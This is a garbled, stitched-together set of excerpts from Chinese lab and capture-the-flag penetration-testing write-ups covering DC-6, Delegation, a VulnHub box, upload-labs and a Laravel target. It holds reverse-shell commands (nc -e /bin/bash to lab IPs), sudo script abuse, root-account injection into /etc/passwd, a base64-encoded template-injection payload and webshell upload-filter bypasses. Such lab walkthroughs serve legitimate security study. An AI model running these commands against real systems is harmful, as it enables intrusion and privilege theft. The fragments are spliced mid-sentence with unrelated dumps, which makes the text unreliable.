01 项目安装 先把DC-6的靶机安装到本地 下载地址是:https://www.five86.com/dc-6.html 进入页面点击here 进行下载 下载好之后,导入咱们的虚拟机 看到这个页面 --url http://wordy/ -e u 用户名为:admin,mark,graham,sarah,jens 既然获取到了用户名,现在只需要获得密码,就可以直接爆破 寻找了一番,发现DC-6的作者已经把密码告诉我了我们
2222 -e /bin/bash itkjz 获取交互shell python -c "import pty;pty.spawn('/bin/bash')" root@bbkali:/tmp/dc6# 36108 python -c "import pty;pty.spawn('/bin/bash')" 常规翻看目录,发现有价值提示to-do-sometings.txt www-data@dc-6: (jens) NOPASSWD: /home/jens/backups.sh graham@dc-6:/home$ cat /home/jens/backups.sh #! nc 192.168.241.129 2223 -e /bin/bash graham@dc-6:/home/jens$ sudo -u jens . Hope you enjoyed DC-6.
MULTICAST> mtu 1500 inet 172.22.9.19 netmask 255.255.0.0 broadcast 172.22.255.255 inet6 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6: ⼀般打靶场这种后续都可以利⽤到。 v=K6gHnr-VkAg [!] CVE-2019-1388 : VULNERABLE [>] https://github.com/jas502n/CVE-2019-1388 [!]
Delegation是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
ssh-hostkey: | 2048 dc:e8:ad:80:35:81:c4:29:7e:cf:e4:70:f2:69:d9:96 (RSA) | 256 46:20:20:03:9c:97:35:f6: 2d:5d:62:4a:be:6c:95:8e (ECDSA) |_ 256 ae:90:88:f6:63:8d:dc:60:fa:ff:fc:70:12:e4:f4:1f (ED25519) MAC 密码anonymous采用匿名登录 默认是ASCII模式,输入binary切换为二进制模式 get cred.txt welcome将ftp文件获取到本地 打开cred.txt获取文件内容Y2hhbXA6cGFzc3dvcmQ
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDU3ODUzNjcwMTMzNTUyOTgzMDExNzk0MzIxNzYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0aW1lX2ludGVydmFsIgoKMjAyOS0wNS0yNiB0byAyMDI5LTA1LTI3Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ibGVhdmVfcmVxdWVzdCIKCntjbWR9Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic2lnbmF0dXJlIjsgZmlsZW5hbWU9IlVudGl0bGVkLnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKColQTkcKGgoAAAAKSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAApSURBVChTY9i PGZvbnQgY29sb3I9IlsgWyBnZXRhdHRyKHBvdywgV29yZCgnX19nbG9iYWxzX18nKSlbJ29zJ10uc3lzdGVtKCd7Y21kfScpIGZvciBXb3JkIGluIFsgb3JnVHlwZUZ1biggJ1dvcmQnLCAoc3RyLCksIHsgJ211dGF0ZWQnOiAxLCAnc3RhcnRzd2l0aCc6IGxhbWJkYSBzZWxmLCB4OiBGYWxzZSwgJ19fZXFfXyc6IGxhbWJkYSBzZWxmLCB4OiBzZWxmLm11dGF0ZSgpIGFuZCBzZWxmLm11dGF0ZWQgPCAwIGFuZCBzdHIoc2VsZikgPT0geCwgJ211dGF0ZSc6IGxhbWJkYSBzZWxmOiB7c2V0YXR0cihzZWxmLCAnbXV0YXRlZCcsIHNlbGYubXV0YXRlZCAtIDEpfSwgJ19faGFzaF9fJzogbGFtYmRhIHNlbGY6IGhhc2goc3RyKHNlbGYpKSwgfSwgKSBdIF0gZm9yIG9yZ1R5cGVGdW4gaW4gW3R5cGUodHlwZSgxKSldXSBhbmQgJ3JlZCciPgoxPC9mb250PjwvcD4
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
192.168.0.104 Linux Kernel 192.168.0.103 涉及技术 主机发现 网络扫描 强制访问 参数爆破 文件包含 PHP封装器 任意文件读取 SSH公钥登录 离线密码破解 系统权限漏洞利用 打靶开始 passwd可以进行文件写入 使用,openssl 生成一段密文 openssl passwd -1 然后替换/etc/passwd里面的x 20210925234956721039.png 提权成功,打靶结束
: 192.168.153.130 192.168.1.102 win7 > ip :192.168.153.128 win10 > ip : 192.168.153.129 0x02 打靶记录
https://github.com/jas502n/CVE-2020-10199 直接获得root权限: 寻找最后一个flag 6. 注意 这个靶场好多坑耗时间。
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3 8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3
既然看到了登录密码框,而且提示,账户名为:admin,只需要就用BurpSuite将密码爆破出来
[1] = 1129601360;erp[2] = 1159751796;erp[3] = 1835810317;erp[4] = 171731060;erp[5] = 1835810317;erp[6] :00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 m h dom mon dow user command17 * * * * root cd / && run-parts --report /etc/cron.hourly25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )52 6 1 *
在页面中多浏览一下,发现Contact模块下可以输入内容,于是尝试多输入几次之后,发现了有意思的地方
一句话木马getshell会在Pass02[4]演示一遍,之后将不再演示1. webshell最好设置不同名,或者在每次上传成功后删除,避免出现绕过失败但测试成功的情况 Pass14~Pass21的题解见:打靶归来 黑名单检测使用特殊方法绕过 【Pass03 - 使用其它后缀名绕过】 题目: fpr5k 绕过方法: 本题使用黑名单过滤,且只过滤原始的后缀,所以可以使用不在其黑名单中的后缀进行绕过,Pass04[5]和Pass05[6] 上传到服务器 htqa4 00wyo 第四步:直接访问更改了后缀的WebShell文件即可执行该文件(1.png) xi4ik 【Pass05 - 利用.user.ini文件包含】 题目: idmjf 6q2kp 这一题可以使用点+空格+点绕过,我们来分析以下这种方法的可行性 moqq9 使用这种方式,可以绕过之前出现的大部分黑名单检测,所以说黑名单检测是真的不安全 【Pass11 - 双写绕过】 题目: tel6p
前言 这篇文章是零度安全2021年的首篇文章,后期将会陆续更新打靶,实战系列的文章。 在这里也感谢大家对零度安全的支持与信任。 ? 6. 页面操作 在逛页面的时候我们看到了flag3 ? 打开看看写了什么 ? 根据提示告诉我们可以去看下密码文件 进入msf会话中,去看下/etc/passwd文件 ?
打靶过程 3.1 第一层 nmap端口扫描 看到80端口开放的Laravel 寻找了多个EXP之后,终于找到一个能用的:将脚本文件和phpggc这个脚本放在同一级目录下 phpgcc:https:/ 'id')命令是root 尝试反弹shell和执行后门文件都不行,所以我直接写入一个root用户,查看/etc/passwd写入成功 (Pdb) os.system('echo 'nami:nami$6L6IhMNlfyB2WqmHiWRy30